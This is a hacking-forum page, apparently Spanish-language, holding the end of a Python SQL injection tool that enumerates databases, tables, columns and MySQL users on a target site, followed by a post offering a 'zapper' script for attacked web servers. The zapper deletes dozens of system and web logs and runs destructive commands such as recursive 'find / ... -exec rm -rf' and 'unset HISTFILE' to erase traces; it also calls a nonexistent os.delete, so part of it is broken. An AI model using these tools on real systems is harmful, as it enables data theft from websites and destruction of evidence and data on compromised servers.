DB\n\n" savefile("logs/"+gethost(web)+".txt","[DB] : "+db) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching tables\n\n" savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Show log\n" print "10 - Change target\n" print "11 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) raw_input() menu(page,bypass) elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) raw_input() menu(page,bypass) elif op == 3: showdbs(page,bypass) raw_input() menu(page,bypass) elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) raw_input() menu(page,bypass) elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) raw_input() menu(page,bypass) elif op == 6: mysqluser(page,bypass) raw_input() menu(page,bypass) elif op == 7: more(page,bypass) raw_input() menu(page,bypass) elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) raw_input() menu(page,bypass) elif op == 9: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 10: sta() except: menu(page,bypass) if op == 11: copyright() def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching more data\n" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla) menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") scan(web,bypasx) sta() #The End
|
|
|
510
|
Programación / Scripting / [Python] Zapper By Doddy H
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos. Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza a borrar huellas. Eso si , no me habia dado cuenta de que facil usar python xDD #!usr/bin/python #Zapper (C) Doddy Hackman import os paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", "/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"] comandos = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST'] print "\n[+] Starting the zapper" for path in paths : try : os.delete(path) except : pass for cmd in comandos : try: os.system(cmd) except: pass print "[+] All logs are erased\n" #The End ?
|
|
|
|
|
|
|